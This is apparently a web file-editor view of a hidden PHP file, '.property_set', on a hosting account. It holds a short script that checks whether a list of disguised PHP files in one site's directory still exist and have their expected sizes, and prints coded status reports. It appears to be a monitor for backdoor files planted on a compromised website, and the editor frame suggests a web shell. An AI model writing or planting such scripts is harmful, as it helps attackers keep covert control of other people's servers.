← Back
Editing: .property_set
<?php $r = '/home/dilsvuwm/hioleon.dilshanabey.com'; $x = ["/qtype.match.php"=>"bd@@1186322@@895", "/sp.resize.php"=>"bd@@1200664@@23", "/sp.match.php"=>"bd@@1180707@@922", "/modifier.replace.php"=>"bd@@1200708@@26", "/modifier.match.php"=>"bd@@1200771@@2", "/modifier.match.php"=>"bd@@1196465@@999", "/qtype_match.php"=>"bd@@1200821@@66", "/qtype.resize.php"=>"bd@@1188290@@870", "/modifier.replace.php"=>"bd@@1191892@@989", "/qtype.resize.php"=>"bd@@1200607@@93", "/modifier.resize.php"=>"bd@@1200878@@1010"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');
Save File
Cancel